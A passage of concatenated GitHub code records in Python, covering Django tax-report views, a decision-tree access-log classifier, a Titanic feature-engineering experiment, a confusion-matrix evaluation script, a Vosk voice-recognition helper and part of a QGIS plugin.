EmployeeListTable(employee)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/employee_list.html', context=context)\n\nclass BalancesList(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n balances = Balance.services.all('buxbalans', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n table = BalancesListTable(balances)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/balances_list.html', context=context)\n\nclass FinancesList(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n finances = Finance.services.all('finreport', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n table = FinancesListTable(finances)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/finances_list.html', context=context)\n\n\nclass ViewBaseNDS(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n base_nds = BaseNDS.services.get('nds', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n context = {\n 'person': person,\n 'object': base_nds\n }\n return render(request, 'taxservices/base_nds_info.html', context=context)\n\nclass ViewReportENP(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n report_enp = ReportENP.services.get('enp', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n context = {\n 'person': person,\n 'object': report_enp\n }\n return render(request, 'taxservices/report_enp_info.html', context=context)\n\n\n# PHYSICAL PERSON SERVICES\nclass SalariesList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n salaries = Salary.services.all('fiz-salary', {\n \"tin\": person.tin, \"pinfl\": \"\", \"lang\": \"uz\",\n \"series_passport\": \"\", \"number_passport\": \"\"})\n table = SalaryTable(salaries)\n context = {\n 'title': 'Сведения о заработной плате',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass TaxDebtsList(View):\n def get(self, request, slug):\n if slug[0] == 'J':\n person = JuridicalPerson.objects.get(slug=slug)\n taxdebts = TaxDebt.services.all('yurdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = TaxDebtTable(taxdebts)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/taxdebts_list.html', context=context)\n else:\n person = PhysicalPerson.objects.get(slug=slug)\n taxdebts = TaxDebt.services.all('fizdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = TaxDebtTable(taxdebts)\n context = {\n 'title': 'Налоговая задолженность',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass FoundersList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n founders = Founder.services.all('np3', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = FounderTable(founders)\n context = {\n 'title': 'Юридическое лицо, в котором физическое лицо является учредителем',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass DividendList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n dividend = Dividend.services.all('np3', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n table = DividendTable(dividend)\n context = {\n 'title': 'Сведения о полученных дивидендах',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass ObjectsList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n objects = Object.services.all('fiz/tax-objects', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = ObjectTable(objects)\n context = {\n 'title': 'Сведения об имуществе физического лица',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass LeasedsList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n leaseds = Leased.services.all('rents', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = LeasedTable(leaseds)\n context = {\n 'title': 'Сведения о сданной в аренду имущества',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass GenerateExcel(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n\n # Налоговый задолженность\n taxdebts = TaxDebt.services.all('yurdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n mydict1 = []\n for item in taxdebts:\n mydict1.append({\n 'tax_name': item.get_tax_name(),\n 'ned_date': item.ned_date,\n 'ned_summa': item.ned_summa,\n 'pen_summa': item.pen_summa,\n })\n df_taxdebt = pd.DataFrame(mydict1)\n\n # Количество сотрудника\n employee = Employee.services.all('yur-employee-count', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n mydict = []\n for item in employee:\n mydict.append({\n 'fio': item.fio,\n 'tin': item.tin,\n 'doxod1': item.doxod1,\n 'doxod2': item.doxod2,\n })\n df_employee = pd.DataFrame(mydict)\n\n # Форма 1\n balances = Balance.services.dictall('buxbalans', {\n \"tin\": person.tin, \"year\": \"2019\",\n \"period\": \"4\", \"lang\": \"uz\"})\n df_right = pd.DataFrame(list(balances.values()))\n df_balance = read_frame(BalanceSheet.objects.all())[['code_str']]\n df_balance = df_balance.join(df_right.set_index('row_no'), on='code_str')\n\n # Форма 2\n finances = Finance.services.dictall('finreport', {\n \"tin\": person.tin, \"year\": \"2019\",\n \"period\": \"4\", \"lang\": \"uz\"})\n df_right = pd.DataFrame(list(finances.values()))\n df_finance = read_frame(FinanceReport.objects.all())[['code_str']]\n df_finance = df_finance.join(df_right.set_index('row_no'), on='code_str')\n\n # ЕНП\n report_enp = ReportENP.services.get('enp', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n base_nds = BaseNDS.services.get('nds', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n\n with BytesIO() as b:\n\n workbook = load_workbook('media/tmp_files/modul.xlsx')\n writer = pd.ExcelWriter(b, engine='openpyxl')\n writer.book = workbook\n writer.sheets = dict((ws.title, ws) for ws in workbook.worksheets)\n\n df_taxdebt.to_excel(writer, sheet_name='Налоговая задолженность', startrow=2, startcol=0, header=False, index=False)\n df_employee.to_excel(writer, sheet_name='Количество работников', startrow=2, startcol=0, header=False, index=False)\n\n df_balance.to_excel(writer, sheet_name='Форма № 1', startrow=3, startcol=1, header=False, index=False)\n df_finance.to_excel(writer, sheet_name='Форма № 2', startrow=4, startcol=1, header=False, index=False)\n\n if report_enp:\n sheet = workbook[\"ЕНП\"]\n sheet['B2'].value = report_enp.enp101\n sheet['B3'].value = report_enp.enp102\n sheet['B4'].value = report_enp.prib10\n\n if base_nds:\n sheet = workbook[\"НДС\"]\n sheet['B2'].value = base_nds.nds\n sheet['B3'].value = base_nds.ndsupr\n\n writer.save()\n response = HttpResponse(b.getvalue(), content_type='application/vnd.ms-excel')\n response[\"Content-Disposition\"] = 'attachment; filename=\"tax_report.xlsx\"'\n return response\n\nclass GenerateWord(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n salaries = Salary.services.all('fiz-salary', {\n \"tin\": person.tin, \"pinfl\": \"\", \"lang\": \"uz\",\n \"series_passport\": \"\", \"number_passport\": \"\"})\n taxdebts = TaxDebt.services.all('fizdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n founders = Founder.services.all('np3', {\"tin\": person.tin, \"lang\": \"uz\"})\n dividend = Dividend.services.all('np3', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n objects = Object.services.all('fiz/tax-objects', {\"tin\": person.tin, \"lang\": \"uz\"})\n leaseds = Leased.services.all('rents', {\"tin\": person.tin, \"lang\": \"uz\"})\n\n doc = DocxTemplate(\"media/tmp_files/report.docx\")\n context = {\n 'person': person,\n 'salaries': salaries,\n 'taxdebts': taxdebts,\n 'founders': founders,\n 'dividend': dividend,\n 'objects': objects,\n 'leaseds': leaseds\n }\n\n doc.render(context)\n\n byte_io = BytesIO()\n doc.save(byte_io)\n byte_io.seek(0)\n\n response = HttpResponse(byte_io.read())\n\n # Content-Disposition header makes a file downloadable\n response[\"Content-Disposition\"] = \"attachment; filename=generated_doc.docx\"\n\n # Set the appropriate Content-Type for docx file\n response[\"Content-Type\"] = \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\"\n\n return response\n","repo_name":"norboyev1990/RiskAssessment","sub_path":"taxservices/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25448568416","text":"#python decision-tree-classifier.py -t ./labeled-data-samples/access.csv -v ./labeled-data-samples/access.2020-04-28.csv\n\nfrom utilities import *\n\nargs = get_args()\ntraning_data = args['traning_data']\ntesting_data = args['testing_data']\n\n# Get training features and labeles\ntraining_features, traning_labels = get_data_details(traning_data)\n\n# Get testing features and labels\ntesting_features, testing_labels = get_data_details(testing_data)\n\n# DECISON TREE CLASSIFIER\nprint(\"\\n\\n=-=-=-=-=-=-=- Decision Tree Classifier -=-=-=-=-=-=-=-\\n\")\n\n# Instanciate the classifier\nattack_classifier = tree.DecisionTreeClassifier()\n\n# Train the classifier\nattack_classifier = attack_classifier.fit(training_features, traning_labels)\n\n# Get predections for the testing data\npredictions = attack_classifier.predict(testing_features)\n\nprint(\"The precision of the Decision Tree Classifier is: \" + str(get_occuracy(testing_labels,predictions, 1)) + \"%\")\n","repo_name":"guptaadi123/MLSEC","sub_path":"decision-tree-classifier.py","file_name":"decision-tree-classifier.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"12019846307","text":"try:\n import matplotlib\n import sys\n\n matplotlib.use('TkAgg' if 'darwin' in sys.platform else 'Agg')\n import matplotlib.pyplot as plt\nexcept Exception as ex:\n print(ex)\n print(\"Matplotlib unavailable\")\n\nimport pandas as pd\n\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.svm import SVR\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\nfrom hallucinate import Experiment, EstimatorConfig, Features, Kaggle\n\n\nclass Transforms(object):\n @staticmethod\n def extract_cabin(df):\n return df['Cabin'].apply(lambda x: x[0])\n\n @staticmethod\n def extract_ticket(df):\n def ret_ticket(ticket):\n ticket = ticket.replace('.', '')\n ticket = ticket.replace('/', '')\n ticket = ticket.split()\n ticket = map(lambda t: t.strip(), ticket)\n ticket = [a for a in filter(lambda t: not t.isdigit(), ticket)]\n if len(ticket) > 0:\n return ticket[0]\n else:\n return 'XXX'\n\n return df['Ticket'].apply(ret_ticket)\n\n @staticmethod\n def extract_title(df):\n return df['Name'].apply(lambda x: x.split('.')[0]).apply(lambda x: x.split(' ')[-1])\n\n @staticmethod\n def extract_surname(df):\n def do_it(a):\n return a[0].split(',')[0] if a[1] > 1 else 'UNK'\n\n return df[['Name', 'FamilySize']].apply(do_it, axis=1)\n\n @staticmethod\n def predict_age(df):\n feats = ['Pclass', 'Sex', 'FareC', 'Ticket', 'Title']\n fs = Features(feats,\n target='Age',\n train_data=pd.DataFrame(df[~df['Age'].isnull()].copy()),\n test_data=pd.DataFrame(df[df['Age'].isnull()].copy()))\n fs.transform(['Pclass', 'Ticket', 'Title'], 'onehot')\n X_train = fs.preprocess().values\n y_train = df[~df['Age'].isnull()]['Age'].values\n regressor = SVR(kernel='rbf')\n regressor.fit(X_train, y_train)\n X_pred = fs.preprocess(for_test=True).values\n y_pred = regressor.predict(X_pred)\n df.ix[df['Age'].isnull(), 'Age'] = y_pred.astype(int)\n return df['Age']\n\n\ndef build_all_experiment(name, train_df, test_df, cv_shuffle):\n exp = Experiment(name=name, cv=30, cv_shuffle=cv_shuffle, sc='accuracy', parallel=True)\n\n bare_feature_names = ['Pclass', 'Sex', 'Fare', 'SibSp', 'Parch', 'Cabin', 'Embarked', 'Title',\n 'Ticket']\n hallucinated_feature_names = ['Fare^2', 'AgeFareRatio', 'FarePerPerson', 'FamilySize', 'Single',\n 'SmallFamily', 'LargeFamily', 'AgeFareRatio^2', 'FareD', 'FareD2',\n 'FarePerPerson^2', 'Surname', 'AgeD']\n\n bare_features = exp.make_features(bare_feature_names, name='Bare Features', train_data=train_df,\n test_data=test_df, target='Survived')\n\n hallucinated_features = exp.make_features(hallucinated_feature_names,\n name='Hallucinated', train_data=train_df,\n test_data=test_df, parent=bare_features,\n target='Survived')\n\n bare_features.set_feature_selector(\n SelectFromModel(DecisionTreeClassifier(random_state=7, max_depth=12), threshold=0.0005))\n hallucinated_features.set_feature_selector(\n SelectFromModel(DecisionTreeClassifier(random_state=7, max_depth=12), threshold=0.0005))\n\n bare_features.transform(['Pclass'], 'onehot')\n bare_features.transform(['Sex'], 'map', mapping={'male': 0, 'female': 1})\n bare_features.transform(['Fare'], 'fillna', strategy='mean')\n\n bare_features.transform(['Cabin'], 'fillna', strategy='value', value='XXX')\n bare_features.transform(['Cabin'], 'method', method_handle=Transforms.extract_cabin)\n bare_features.transform(['Cabin'], 'onehot')\n\n bare_features.transform(['Embarked'], 'fillna', strategy='value', value='S')\n bare_features.transform(['Embarked'], 'onehot')\n\n bare_features.transform(['Title'], 'method', from_=['Name'],\n method_handle=Transforms.extract_title)\n bare_features.transform(['Title'], 'onehot')\n\n bare_features.transform(['Ticket'], 'method', from_=['Ticket'],\n method_handle=Transforms.extract_ticket)\n bare_features.transform(['Ticket'], 'onehot')\n\n hallucinated_features.transform(['Fare'], 'fillna', strategy='mean')\n hallucinated_features.transform(['FareD'], 'discretize', from_=['Fare'],\n values_range=[-0.1, 10, 30])\n hallucinated_features.transform(['FareD'], 'onehot')\n\n hallucinated_features.transform(['FareD2'], 'discretize', from_=['Fare'], q=20)\n hallucinated_features.transform(['FareD2'], 'onehot')\n\n hallucinated_features.transform(['Fare^2'], '*', from_=['Fare, Fare'])\n\n # TODO this will look much better with an ExpressionTransform(expr='SibSp + Parch + 1')\n hallucinated_features.transform(['FamilySize'], '+', from_=['SibSp,Parch,1'])\n hallucinated_features.transform(['Single'], 'map', from_=['FamilySize'],\n mapping={1: 1, '_others': 0})\n hallucinated_features.transform(['SmallFamily'], 'map', from_=['FamilySize'],\n mapping={2: 1, 3: 1, 4: 1, '_others': 0})\n hallucinated_features.transform(['LargeFamily'], 'map', from_=['FamilySize'],\n mapping={1: 0, 2: 0, 3: 0, 4: 0, '_others': 1})\n\n hallucinated_features.transform(['FarePerPerson'], '/', from_=['Fare,FamilySize'])\n hallucinated_features.transform(['FarePerPerson^2'], '*', from_=['FarePerPerson,FarePerPerson'])\n\n # t1.transform(['Age'], 'method', method_handle=Transforms.predict_age)\n hallucinated_features.transform(['Age'], 'fillna', strategy='median')\n\n hallucinated_features.transform(['TmpFare'], 'fillna', from_=['Fare'], strategy='mean')\n hallucinated_features.transform(['TmpFare'], '+', from_=['TmpFare,0.1'])\n hallucinated_features.transform(['AgeFareRatio'], '/', from_=['Age,TmpFare'])\n hallucinated_features.transform(['AgeFareRatio^2'], '*', from_=['AgeFareRatio,AgeFareRatio'])\n\n hallucinated_features.transform(['AgeD'], 'discretize', from_=['Age'],\n values_range=[0, 6, 13, 19, 25, 35, 60])\n hallucinated_features.transform(['AgeD'], 'onehot')\n\n hallucinated_features.transform(['Surname'], 'method', from_=['Name,FamilySize'],\n method_handle=Transforms.extract_surname)\n hallucinated_features.transform(['Surname'], 'onehot')\n\n # t1.transform(['FareC', 'Fare^2', 'AgeFareRatio', 'FarePerPerson'], 'log')\n # t1.transform(['FareC', 'Fare^2', 'AgeFareRatio', 'FarePerPerson'], 'std')\n\n exp.add_estimator(EstimatorConfig(LogisticRegression(n_jobs=1), {}, 'LRE'))\n\n return exp, bare_features\n\n\nif __name__ == '__main__':\n print()\n train_df = pd.read_csv('titanic/train.csv')\n train_df['Survived'] = train_df['Survived'].astype(int)\n test_df = pd.read_csv('titanic/test.csv')\n test_complete_df = pd.read_csv('titanic/test_complete.csv')\n test_complete_df['Survived'] = test_complete_df['Survived'].astype(int)\n\n cv_shuffle = False\n dtr_f_sel_thresholds = [0.0005 + a * 0.0005 for a in range(5)]\n # TODO logistic regression will hang in parallel mode if going <= 0.15 with the threshold\n # Only thing I can correlate with is the training set size. If big, it fucks up silently / hangs\n lr_f_sel_thresholds = [0.1 + a * 0.05 for a in range(5)]\n xgb_f_sel_thresholds = [0.0005 + a * 0.0005 for a in range(8)]\n lgb_f_sel_thresholds = [0.005 + a * 0.005 for a in range(5)]\n print(['{:g}'.format(a) for a in dtr_f_sel_thresholds])\n\n exp2, t2 = build_all_experiment('Kaggle', train_df, test_df, cv_shuffle=cv_shuffle)\n exp2.overview(verbose=0)\n exp2.grid_search_all(f_sel_thresholds=dtr_f_sel_thresholds)\n kaggle = Kaggle(exp2, 'PassengerId')\n submissions = kaggle.create_submissions()\n submissions = pd.concat([submissions, pd.read_csv('titanic/test_complete.csv')[['Survived']]],\n axis=1)\n print('Correlations with real values:\\n')\n print(submissions.corr()[submissions.corr()['Survived'] > 0.5]['Survived'].sort_values(\n ascending=False))\n print('\\nReal accuracies:\\n')\n accuracies = []\n for column in submissions.columns:\n accuracies.append((column, accuracy_score(submissions['Survived'], submissions[column])))\n accuracies = sorted(accuracies, key=lambda x: x[1], reverse=True)\n for acc in accuracies[:10]:\n print('{}: {:.4f}'.format(acc[0], acc[1]))\n exp2.plot_cv_runs()\n exp2.plot_f_sel_learning_curve()\n exp2.plot_feature_importance()\n exp2.plot_correlations()\n plt.show()\n","repo_name":"dvaida/hallucinate","sub_path":"example_usage.py","file_name":"example_usage.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73552114694","text":"import torch\nimport torch.nn.init\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nimport warnings\nimport pandas as pd\n\nfrom dataloader import testloader\nfrom model import CNN\n\nwarnings.filterwarnings(action='ignore')\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nif device == 'cuda':\n torch.cuda.manual_seed_all(777)\n\nSTART_BLOCK_NUM = 1\nBLOCK_NUM = 30\n\nlabel_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n# label_list = ['Bag', 'Boot', 'Coat', 'Dress', 'Pullover', 'Sandal', 'Shirt', 'Sneaker', 'Top', 'Trouser'] # fashion-mnist\n\n\nnp.set_printoptions(precision=2)\n\ndef test_label_predictions(model, device, testloader):\n model.eval()\n actuals = []\n predictions = []\n with torch.no_grad():\n for data, target in testloader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n prediction = output.argmax(dim=1, keepdim=True)\n actuals.extend(target.view_as(prediction))\n predictions.extend(prediction)\n return [i.item() for i in actuals], [i.item() for i in predictions]\n\n\ndef plot_confusion_matrix(y_true, y_pred, classes, title=None, cmap=plt.cm.Blues):\n plt.figure(figsize=(50, 50))\n\n if not title:\n title = 'Normalized confusion matrix'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n # classes = classes[unique_labels(y_true, y_pred)]\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n plt.savefig(\"./matrix/\"+title+\".png\")\n return ax\n\n\ndef class_accuracy(model):\n class_correct = list(0. for i in range(10))\n class_total = list(0. for i in range(10))\n\n with torch.no_grad():\n for data in testloader:\n images, labels = data\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n c = (predicted == labels).squeeze()\n for i in range(4):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n for i in range(10):\n print('Accuracy of %3s : %2d %%' % (label_list[i], 100 * class_correct[i] / class_total[i]))\n\n\ndef create_eval_dataset(shard_name, block_num):\n shard_path = \"./experiment_data/shard1/\" + str(block_num) + \"/model/\" + shard_name + \".pt\"\n model = CNN().to(device)\n model.load_state_dict(torch.load(shard_path), strict=False)\n model.eval()\n actuals, predictions = test_label_predictions(model, device, testloader)\n\n if shard_name == \"aggregation\":\n plot_confusion_matrix(actuals, predictions, classes=label_list, title=\"Block\" + str(block_num) + \"_\" + shard_name)\n\n accuracy = accuracy_score(actuals, predictions) * 100\n # f1 = f1_score(actuals, predictions, average='weighted') * 100\n\n print(\"{0} : {1:.3f}\".format(shard_name, accuracy))\n \n if shard_name == \"aggregation\":\n print(\"-\" * 25)\n class_accuracy(model)\n print(\" \")\n return accuracy\n\n\nacc_dict = {}\n\nfor block in np.arange(START_BLOCK_NUM, BLOCK_NUM+1):\n print(\"<----------- Block Number: {0} ----------->\".format(block))\n s1_data = create_eval_dataset(\"shard1\", block)\n s2_data = create_eval_dataset(\"shard2\", block)\n s3_data = create_eval_dataset(\"shard3\", block)\n s4_data = create_eval_dataset(\"shard4\", block)\n s5_data = create_eval_dataset(\"shard5\", block)\n fedavg_data = create_eval_dataset(\"aggregation\", block)\n\n acc_dict[block] = s1_data, s2_data, s3_data, s4_data, s5_data, fedavg_data\n\ntuples = []\ns1_row_data = [\"shard1\"]\ns2_row_data = [\"shard2\"]\ns3_row_data = [\"shard3\"]\ns4_row_data = [\"shard4\"]\ns5_row_data = [\"shard5\"]\nfedavg_row_data = [\"FedAvg\"]\n\n\nfor block in np.arange(START_BLOCK_NUM, BLOCK_NUM+1):\n s1_row_data.append(acc_dict[block][0])\n s2_row_data.append(acc_dict[block][1])\n s3_row_data.append(acc_dict[block][2])\n s4_row_data.append(acc_dict[block][3])\n s5_row_data.append(acc_dict[block][4])\n fedavg_row_data.append(acc_dict[block][5])\n\ncolumn = [\"accuracy\"]\ncolumns = [\"shard\"]\n\nfor block in np.arange(START_BLOCK_NUM, BLOCK_NUM+1):\n columns.extend(column)\n\ntuples = [\n s1_row_data,\n s2_row_data,\n s3_row_data,\n s4_row_data,\n s5_row_data,\n fedavg_row_data\n]\n\ndf = pd.DataFrame(tuples, columns=columns)\ndf.to_excel(\"./acc_data/Block_data.xlsx\", index=False)\n","repo_name":"dongdalee/Blockchain_FL","sub_path":"utility/plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3502136166","text":"from io import BytesIO\nimport vosk\nimport json\nfrom pydub import AudioSegment\nfrom os import path\n\nfrom container import parent_dir\n\nmodel_path = path.normpath(path.join(parent_dir, 'model', 'vosk-model-small-ru-0.22'))\nmodel = vosk.Model(model_path)\nsamplerate = 16000\n\n\ndef ogg_to_mp3_in_memory(ogg_data):\n try:\n # Преобразовываем данные OGG в BytesIO объект\n ogg_bytes = BytesIO(ogg_data)\n\n # Загружаем аудио из BytesIO\n audio = AudioSegment.from_file(ogg_bytes, format=\"ogg\")\n\n # Создаем BytesIO для хранения MP3 данных\n mp3_bytes = BytesIO()\n\n # Экспортируем аудио в формате MP3 в BytesIO\n audio.export(mp3_bytes, format=\"mp3\")\n\n # Получаем MP3 данные из BytesIO\n mp3_data = mp3_bytes.getvalue()\n\n return mp3_data\n except Exception as e:\n print(f\"Ошибка при конвертации: {str(e)}\")\n return None\n\n\ndef voice_message_recognition(voice_message_path):\n audio_segment = AudioSegment.from_file(voice_message_path, format='ogg',\n )\n\n # Конвертируем OGG данные в MP3 в памяти\n mp3_bytes = BytesIO()\n # Экспортируем аудио в формате MP3 в BytesIO\n audio_segment.export(mp3_bytes, format=\"mp3\")\n # Получаем MP3 данные из BytesIO\n mp3_data = mp3_bytes.getvalue()\n try:\n # Загружаем аудиофайл из MP3 данных\n audio = AudioSegment.from_mp3(BytesIO(mp3_data))\n except Exception as e:\n print(\"Ошибка загрузки аудиофайла:\", str(e))\n return\n\n # Преобразуем аудиофайл в WAV формат\n audio = audio.set_channels(1) # Преобразовываем в моно для Vosk\n audio = audio.set_frame_rate(samplerate)\n audio_data = audio.raw_data\n # Инициализируем KaldiRecognizer с моделью\n rec = vosk.KaldiRecognizer(model, samplerate)\n # Производим распознавание аудио\n rec.AcceptWaveform(audio_data)\n # Получаем результат в виде JSON\n result = json.loads(rec.Result())\n recognized_text = result[\"text\"]\n return recognized_text\n\n\ndef voice_to_text(voice_message_path):\n transcribed_text = voice_message_recognition(voice_message_path)\n if transcribed_text:\n print(\"Распознанный текст:\", transcribed_text)\n return transcribed_text\n\n\nif __name__ == '__main__':\n print()\n","repo_name":"Artemprod/aipo","sub_path":"speach_to_text.py","file_name":"speach_to_text.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4037653295","text":"\"\"\"\nThis file is part of Giswater 3\nThe program is free software: you can redistribute it and/or modify it under the terms of the GNU\nGeneral Public License as published by the Free Software Foundation, either version 3 of the License,\nor (at your option) any later version.\n\"\"\"\n# -*- coding: utf-8 -*-\nimport importlib\nimport sys\nimport os\nfrom enum import Enum\nfrom functools import partial\n\nfrom qgis.PyQt.QtCore import Qt\nfrom qgis.PyQt.QtGui import QColor\nfrom qgis.gui import QgsMapToolEmitPoint, QgsVertexMarker\n\nfrom ...ui.ui_manager import DlgButton2\nfrom ....settings import giswater_folder, tools_log, tools_qgis, tools_qt, tools_gw\ndialog = importlib.import_module('.dialog', package=f'{giswater_folder}.core.toolbars')\nsnap_manager = importlib.import_module('.snap_manager', package=f'{giswater_folder}.core.utils')\n\nclass SelectionType(Enum):\n ACTIVE = 0\n ALL = 1\n\n\n# TODO: comprobar si se cierra bien la map tool o no\n# TODO: comprobar si se restablece correctamente la configuracion de usuario\n# TODO: limpiar, ordenar y comentar codigo\n# TODO: mirate como funcionan los radiobuttons, hay mas formas\n\nclass MyButton2(dialog.GwAction):\n\n def __init__(self, icon_path, action_name, text, toolbar, action_group):\n\n super().__init__(icon_path, action_name, text, toolbar, action_group)\n self.vertex_marker = None\n self.emit_point = None\n\n\n def clicked_event(self):\n\n self.selection_type = SelectionType.ACTIVE\n self.dlg = DlgButton2()\n tools_gw.load_settings(self.dlg)\n\n # Secció: selecció de capes\n self.dlg.rdb_layers_active.clicked.connect(partial(self.selection_type_changed, SelectionType.ACTIVE))\n self.dlg.rdb_layers_all.clicked.connect(partial(self.selection_type_changed, SelectionType.ALL))\n\n # Secció: activar l'estat de \"seleccionant al mapa\"\n self.dlg.btn_select.clicked.connect(self.selection_start)\n self.dlg.btn_cancel.clicked.connect(self.deactivate_signals)\n self.dlg.btn_cancel.clicked.connect(lambda: self.dlg.rdb_layers_active.setEnabled(True))\n self.dlg.btn_cancel.clicked.connect(lambda: self.dlg.rdb_layers_all.setEnabled(True))\n # Secció: sortida\n self.dlg.btn_close.clicked.connect(self.dlg.close)\n self.dlg.rejected.connect(partial(tools_gw.save_settings, self.dlg))\n self.dlg.rejected.connect(partial(self.deactivate_signals))\n\n self.refresh_selection_type()\n\n tools_gw.open_dialog(self.dlg)\n\n\n def selection_type_changed(self, new_type):\n\n self.selection_type = SelectionType(new_type)\n self.refresh_selection_type()\n\n\n def refresh_selection_type(self):\n\n if self.selection_type == SelectionType.ACTIVE:\n self.dlg.chk_layer_arc.setEnabled(False)\n self.dlg.chk_layer_connec.setEnabled(False)\n self.dlg.chk_layer_node.setEnabled(False)\n else:\n self.dlg.chk_layer_arc.setEnabled(True)\n self.dlg.chk_layer_connec.setEnabled(True)\n self.dlg.chk_layer_node.setEnabled(True)\n\n\n def selection_start(self):\n\n self.is_selecting = True\n self.dlg.rdb_layers_active.setEnabled(False)\n self.dlg.rdb_layers_all.setEnabled(False)\n self.emit_point = QgsMapToolEmitPoint(self.canvas)\n self.canvas.setMapTool(self.emit_point)\n\n # Snapper\n self.snapper_manager = snap_manager.GwSnapManager(self.iface)\n self.snapper = self.snapper_manager.get_snapper()\n\n # Vertex marker\n self.vertex_marker = QgsVertexMarker(self.canvas)\n self.vertex_marker.setColor(QColor(255, 100, 255))\n self.vertex_marker.setIconSize(15)\n self.vertex_marker.setIconType(QgsVertexMarker.ICON_CROSS)\n self.vertex_marker.setPenWidth(3)\n\n # Store user snapping configuration\n self.previous_snapping = self.snapper_manager.get_snapping_options()\n\n if self.selection_type == SelectionType.ACTIVE:\n tools_log.log_info(\"single selector\")\n self.activate_snapping(self.emit_point)\n elif self.selection_type == SelectionType.ALL:\n tools_log.log_info(\"all selector\")\n # Store user snapping configuration\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_arc) or \\\n tools_qt.is_checked(self.dlg, self.dlg.chk_layer_connec) or \\\n tools_qt.is_checked(self.dlg, self.dlg.chk_layer_node):\n self.set_user_config()\n 